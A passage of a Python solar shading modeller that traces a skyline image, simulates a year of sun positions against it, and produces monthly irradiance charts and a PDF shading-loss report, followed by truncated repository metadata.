'ResizedImage.bmp', img_resized.format)\r\n\r\n            r, imgcsv_azimuth, 
imgcsv_elevation = redlineImage(img_resized, threshold)\r\n\r\n # Write to csv\r\n with open(values['output_folder'] + '/' + values['location_name'] + '/' + 'ImageVectorData.csv', 'w', newline='') as img_csv_file:\r\n writer = csv.writer(img_csv_file)\r\n writer.writerow(['azimuth', 'elevation'])\r\n writer.writerows(zip(imgcsv_azimuth, imgcsv_elevation))\r\n\r\n r.show()\r\n r.save(values['output_folder'] + '/' + values['location_name'] + '/' + 'TracedImage.bmp')\r\n\r\n linspace_azimuths = imgcsv_azimuth\r\n linspace_elevations = imgcsv_elevation\r\n\r\n # Repeat code above for sensitivity tester\r\n\r\n # Draw plotting axes\r\n\r\n plt.figure(1)\r\n plt.xlim(right=360, left=0)\r\n plt.xticks(np.arange(0, 361, 30))\r\n plt.ylim(top=90, bottom=0)\r\n plt.yticks(np.arange(0, 91, 10))\r\n plt.xlabel('Azimuth from 0 to 360 degrees')\r\n plt.ylabel('Elevation from 0 to 90 degrees')\r\n plt.title('Skyline & sun path chart')\r\n\r\n # Program will iteratively compute at the user-defined interval\r\n # Not recommended to compute at intervals below 5 minutes on computers with less than 8GB RAM\r\n # 5 minutes is sufficient for fairly accurate results; 15 minutes for quick results\r\n\r\n frequency = int(values['interval_slider'])\r\n time_intervals = np.linspace(0, 525600, num=525600 // frequency, dtype=int)\r\n shade_counter = 0\r\n\r\n potential_insolation_counter = 0\r\n actual_insolation_counter = 0\r\n instant_potential_insolation = 0\r\n instant_actual_insolation = 0\r\n\r\n jan_min, feb_min, mar_min, apr_min, may_min, jun_min, jul_min, aug_min, sep_min, oct_min, nov_min, dec_min \\\r\n = [], [], [], [], [], [], [], [], [], [], [], []\r\n\r\n jan_insolation, feb_insolation, mar_insolation, apr_insolation, may_insolation, jun_insolation, jul_insolation, \\\r\n aug_insolation, sep_insolation, oct_insolation, nov_insolation, dec_insolation \\\r\n = [], [], [], [], [], [], [], [], [], [], [], []\r\n\r\n sun_azi_array = []\r\n sun_elev_array = []\r\n\r\n text_data = open(values['output_folder'] + '/' + values['location_name'] + '/' + r\"RawData.txt\", \"w\")\r\n\r\n # Begin iterative computing\r\n\r\n for time_min in time_intervals:\r\n #if time_min % 10080 == 0: # Progress meter too slow\r\n #sg.OneLineProgressMeter('Computing solar obstructions', time_min+1, 525600, 'key')\r\n\r\n day = time_min // 1440\r\n hr = (time_min - day * 1440) // 60\r\n min = (time_min - day * 1440 - hr * 60)\r\n\r\n print('\\n', day, hr, min, file=text_data)\r\n print('\\n', day, hr, min)\r\n\r\n zen_deg_rounded, azi_deg_rounded, elev_deg_rounded, night_or_day = solar_position_calc(day, hr, min)\r\n\r\n if night_or_day == 'Night':\r\n instant_actual_insolation = 0\r\n\r\n else:\r\n instant_potential_insolation = insolation(zen_deg_rounded)\r\n potential_insolation_counter = potential_insolation_counter + instant_potential_insolation\r\n\r\n if elev_deg_rounded < azimuth_to_elevation(azi_deg_rounded):\r\n instant_actual_insolation = 0\r\n print('Is shaded', file=text_data)\r\n print('Is shaded')\r\n\r\n else:\r\n instant_actual_insolation = insolation(zen_deg_rounded)\r\n actual_insolation_counter = actual_insolation_counter + instant_actual_insolation\r\n print('Is not shaded', file=text_data)\r\n print('Is not shaded')\r\n\r\n sun_azi_array.append(azi_deg_rounded)\r\n sun_elev_array.append(elev_deg_rounded)\r\n\r\n # year_chart = plt.plot(azi_deg_rounded, elev_deg_rounded, 'r,')\r\n\r\n if day == 14: # 15 Jan is day 14, starting from day 0\r\n jan_min.append((time_min - day * 1440) / 60)\r\n 
jan_insolation.append(instant_actual_insolation)\r\n\r\n if day == 45: # 15 Feb is day 45, from day 0\r\n feb_min.append((time_min - day * 1440) / 60)\r\n feb_insolation.append(instant_actual_insolation)\r\n\r\n if day == 73: # 15 Mar is day 73, from day 0\r\n mar_min.append((time_min - day * 1440) / 60)\r\n mar_insolation.append(instant_actual_insolation)\r\n\r\n if day == 104:\r\n apr_min.append((time_min - day * 1440) / 60)\r\n apr_insolation.append(instant_actual_insolation)\r\n\r\n if day == 134:\r\n may_min.append((time_min - day * 1440) / 60)\r\n may_insolation.append(instant_actual_insolation)\r\n\r\n if day == 165:\r\n jun_min.append((time_min - day * 1440) / 60)\r\n jun_insolation.append(instant_actual_insolation)\r\n\r\n if day == 195:\r\n jul_min.append((time_min - day * 1440) / 60)\r\n jul_insolation.append(instant_actual_insolation)\r\n\r\n if day == 226:\r\n aug_min.append((time_min - day * 1440) / 60)\r\n aug_insolation.append(instant_actual_insolation)\r\n\r\n if day == 257:\r\n sep_min.append((time_min - day * 1440) / 60)\r\n sep_insolation.append(instant_actual_insolation)\r\n\r\n if day == 287:\r\n oct_min.append((time_min - day * 1440) / 60)\r\n oct_insolation.append(instant_actual_insolation)\r\n\r\n if day == 318:\r\n nov_min.append((time_min - day * 1440) / 60)\r\n nov_insolation.append(instant_actual_insolation)\r\n\r\n if day == 348:\r\n dec_min.append((time_min - day * 1440) / 60)\r\n dec_insolation.append(instant_actual_insolation)\r\n\r\n year_chart = plt.plot(sun_azi_array, sun_elev_array, 'r,')\r\n\r\n total_potential_insolation_watts = potential_insolation_counter / len(time_intervals)\r\n total_actual_insolation_watts = actual_insolation_counter / len(time_intervals)\r\n\r\n total_potential_insolation_kwh = 1580\r\n total_actual_insolation_kwh = round((total_actual_insolation_watts / total_potential_insolation_watts) * total_potential_insolation_kwh)\r\n\r\n pct_shading_loss = ((total_potential_insolation_kwh - total_actual_insolation_kwh) * 100) / total_potential_insolation_kwh\r\n\r\n print('\\nTotal solar potential if the location is unshaded =', total_potential_insolation_kwh,\r\n 'kWh/sqm/year', file=text_data)\r\n print('\\nActual solar energy accounting for shading =', total_actual_insolation_kwh, 'kWh/sqm/year',\r\n file=text_data)\r\n print('\\nGenerating PDF report - SolarReport.pdf - file can be found in active program folder', file=text_data)\r\n\r\n print('\\nTotal solar potential if the location is unshaded =', total_potential_insolation_kwh,\r\n 'kWh/sqm/year')\r\n print('\\nActual solar energy accounting for shading =', total_actual_insolation_kwh, 'kWh/sqm/year')\r\n print('\\nGenerating PDF report - SolarReport.pdf - file can be found in active program folder')\r\n\r\n print('\\nSaving raw data text output - RawData.txt - file can be found in active program folder. 
This may take a while.')\r\n\r\n text_data.close()\r\n\r\n # Begin plotting functions\r\n # These functions are responsible for generating the final PDF report\r\n\r\n plt.figure(1)\r\n year_chart = plt.plot(linspace_azimuths, linspace_elevations)\r\n\r\n plt.figure(2)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 January')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n jan_chart = plt.plot(jan_min, jan_insolation)\r\n\r\n plt.figure(3)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 February')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n feb_chart = plt.plot(feb_min, feb_insolation)\r\n\r\n plt.figure(4)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 March')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n mar_chart = plt.plot(mar_min, mar_insolation)\r\n\r\n plt.figure(5)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 April')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n apr_chart = plt.plot(apr_min, apr_insolation)\r\n\r\n plt.figure(6)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 May')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n may_chart = plt.plot(may_min, may_insolation)\r\n\r\n plt.figure(7)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 June')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n jun_chart = plt.plot(jun_min, jun_insolation)\r\n\r\n plt.figure(8)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 July')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n jul_chart = plt.plot(jul_min, jul_insolation)\r\n\r\n plt.figure(9)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 August')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n aug_chart = plt.plot(aug_min, aug_insolation)\r\n\r\n plt.figure(10)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 September')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n sep_chart = plt.plot(sep_min, sep_insolation)\r\n\r\n plt.figure(11)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 October')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n oct_chart = plt.plot(oct_min, oct_insolation)\r\n\r\n plt.figure(12)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 November')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n nov_chart = plt.plot(nov_min, nov_insolation)\r\n\r\n plt.figure(13)\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15 December')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n dec_chart = plt.plot(dec_min, dec_insolation)\r\n\r\n plt.figure(14)\r\n plt.plot(jan_min, jan_insolation, label='Jan')\r\n plt.plot(feb_min, feb_insolation, label='Feb')\r\n plt.plot(mar_min, mar_insolation, label='Mar')\r\n plt.plot(apr_min, apr_insolation, label='Apr')\r\n plt.plot(may_min, may_insolation, label='May')\r\n plt.plot(jun_min, jun_insolation, label='Jun')\r\n plt.plot(jul_min, 
jul_insolation, label='Jul')\r\n plt.plot(aug_min, aug_insolation, label='Aug')\r\n plt.plot(sep_min, sep_insolation, label='Sep')\r\n plt.plot(oct_min, oct_insolation, label='Oct')\r\n plt.plot(nov_min, nov_insolation, label='Nov')\r\n plt.plot(dec_min, dec_insolation, label='Dec')\r\n plt.legend(loc='upper right')\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15th of each month (whole year)')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n\r\n plt.figure(15)\r\n plt.plot(jan_min, jan_insolation, label='Jan')\r\n plt.plot(feb_min, feb_insolation, label='Feb')\r\n plt.plot(mar_min, mar_insolation, label='Mar')\r\n plt.legend(loc='upper right')\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15th of each month (1st quarter)')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n\r\n plt.figure(16)\r\n plt.plot(apr_min, apr_insolation, label='Apr')\r\n plt.plot(may_min, may_insolation, label='May')\r\n plt.plot(jun_min, jun_insolation, label='Jun')\r\n plt.legend(loc='upper right')\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15th of each month (2nd quarter)')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n\r\n plt.figure(17)\r\n plt.plot(jul_min, jul_insolation, label='Jul')\r\n plt.plot(aug_min, aug_insolation, label='Aug')\r\n plt.plot(sep_min, sep_insolation, label='Sep')\r\n plt.legend(loc='upper right')\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15th of each month (3rd quarter)')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n\r\n plt.figure(18)\r\n plt.plot(oct_min, oct_insolation, label='Oct')\r\n plt.plot(nov_min, nov_insolation, label='Nov')\r\n plt.plot(dec_min, dec_insolation, label='Dec')\r\n plt.legend(loc='upper right')\r\n plt.xlim(right=22, left=5)\r\n plt.xticks(np.arange(5, 22, step=1))\r\n plt.xlabel('Time through 15th of each month (4th quarter)')\r\n plt.ylabel('Instantaneous irradiance in watts per sqm')\r\n\r\n with PdfPages(values['output_folder'] + '/' + values['location_name'] + '/' + 'SolarReport.pdf') as pdf:\r\n firstPage = plt.figure()\r\n firstPage.clf()\r\n txt0 = 'Solar shading report for location: ' + values['location_name']\r\n txt1 = 'Total solar potential if the location is unshaded = ' + str(\r\n round(total_potential_insolation_kwh)) + ' kWh/sqm/year'\r\n txt2 = 'Actual irradiance accounting for shading = ' + str(\r\n round(total_actual_insolation_kwh)) + ' kWh/sqm/year'\r\n txt3 = 'Energy loss due to shading = ' + str(round(pct_shading_loss)) + '%'\r\n firstPage.text(0.5, 0.58, txt0, transform=firstPage.transFigure, size=9, ha=\"center\")\r\n firstPage.text(0.5, 0.48, txt1, transform=firstPage.transFigure, size=8, ha=\"center\")\r\n firstPage.text(0.5, 0.52, txt2, transform=firstPage.transFigure, size=8, ha=\"center\")\r\n firstPage.text(0.5, 0.44, txt3, transform=firstPage.transFigure, size=8, ha=\"center\")\r\n pdf.savefig(firstPage)\r\n\r\n for fig in range(1, plt.gcf().number):\r\n pdf.savefig(fig)\r\n\r\n break\r\n window.Close()\r\n\r\n\r\n# Pop up a window to open the PDF report\r\n\r\nif event == 'Compute':\r\n# sg.Popup('Solar report generated at selected folder - SolarReport.pdf')\r\n\r\n layout2 = [[sg.Text('Solar report generated at selected folder - SolarReport.pdf')],\r\n [sg.Button('Open'), sg.Button('Cancel')]]\r\n\r\n window2 = sg.Window('Solar shading report 
generated', layout2)\r\n event2, values2 = window2.Read()\r\n\r\n while True:\r\n if event2 is None or event2 == 'Cancel':\r\n break\r\n if event2 == 'Open':\r\n os.startfile(values['output_folder'] + '/' + values['location_name'] + '/' + 'SolarReport.pdf')\r\n break\r\n window2.Close()\r\n\r\n# End of program, report generated as SolarReport.pdf in the running directory\r\n\r\n# End experimental GUI code\r\n", "repo_name": "bowenfan96/solar-shading-modeller", "sub_path": "ssm_v0.5.py", "file_name": "ssm_v0.5.py", "file_ext": "py", "file_size_in_byte": 27933, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "re.search", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 123, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 145, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 145, "usage_type": "name"}, {"api_name": "PySimpleGUI.Text", "line_number": 186, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 186, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 187, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 187, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 188, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 188, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 189, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 189, "usage_type": "call"}, {"api_name": 
"PySimpleGUI.Text", "line_number": 190, "usage_type": "call"}, {"api_name": "PySimpleGUI.Radio", "line_number": 191, "usage_type": "call"}, {"api_name": "PySimpleGUI.Radio", "line_number": 192, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 193, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 193, "usage_type": "call"}, {"api_name": "PySimpleGUI.FileBrowse", "line_number": 194, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 195, "usage_type": "call"}, {"api_name": "PySimpleGUI.Input", "line_number": 195, "usage_type": "call"}, {"api_name": "PySimpleGUI.FolderBrowse", "line_number": 195, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 196, "usage_type": "call"}, {"api_name": "PySimpleGUI.Slider", "line_number": 197, "usage_type": "call"}, {"api_name": "PySimpleGUI.T", "line_number": 199, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 200, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 200, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 201, "usage_type": "call"}, {"api_name": "PySimpleGUI.Slider", "line_number": 202, "usage_type": "call"}, {"api_name": "PySimpleGUI.T", "line_number": 204, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 205, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 205, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 208, "usage_type": "call"}, {"api_name": "PySimpleGUI.Popup", "line_number": 225, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 233, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 233, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 237, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 237, "usage_type": "name"}, {"api_name": "resizeimage.resizeimage.resize_width", "line_number": 242, "usage_type": "call"}, {"api_name": "resizeimage.resizeimage", "line_number": 242, "usage_type": "name"}, {"api_name": "PySimpleGUI.Popup", "line_number": 252, "usage_type": "call"}, {"api_name": "PySimpleGUI.Popup", "line_number": 254, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 260, "usage_type": "call"}, {"api_name": "PySimpleGUI.Popup", "line_number": 264, "usage_type": "call"}, {"api_name": "PySimpleGUI.Popup", "line_number": 266, "usage_type": "call"}, {"api_name": "PySimpleGUI.Popup", "line_number": 268, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 275, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 275, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 279, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 279, "usage_type": "name"}, {"api_name": "resizeimage.resizeimage.resize_width", "line_number": 284, "usage_type": "call"}, {"api_name": "resizeimage.resizeimage", "line_number": 284, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 307, "usage_type": "name"}, {"api_name": 
"numpy.arange", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 309, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 309, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 309, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 310, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 311, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 311, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 312, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 312, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 425, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 425, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 453, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 456, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 456, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 457, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 457, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 458, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 458, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 458, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 459, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 459, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 460, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 460, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 461, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 461, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 463, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 463, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 464, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 464, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 465, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 465, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 465, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 466, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 466, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 467, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 467, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 468, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 468, "usage_type": "name"}, 
{"api_name": "matplotlib.pyplot.figure", "line_number": 470, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 470, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 471, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 471, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 472, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 472, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 472, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 473, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 473, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 474, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 474, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 475, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 475, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 477, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 477, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 478, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 478, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 479, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 479, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 479, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 480, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 480, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 481, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 481, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 482, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 482, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 484, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 484, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 485, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 485, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 486, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 486, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 486, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 487, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 487, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 488, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 488, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 489, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 489, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 491, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 491, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 492, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 492, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 493, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
493, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 493, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 494, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 494, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 495, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 495, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 496, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 496, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 498, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 499, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 499, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 500, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 500, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 500, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 501, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 501, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 502, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 502, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 503, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 503, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 505, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 505, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 506, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 506, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 507, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 507, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 507, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 508, "usage_type": "call"}, {"api_name": 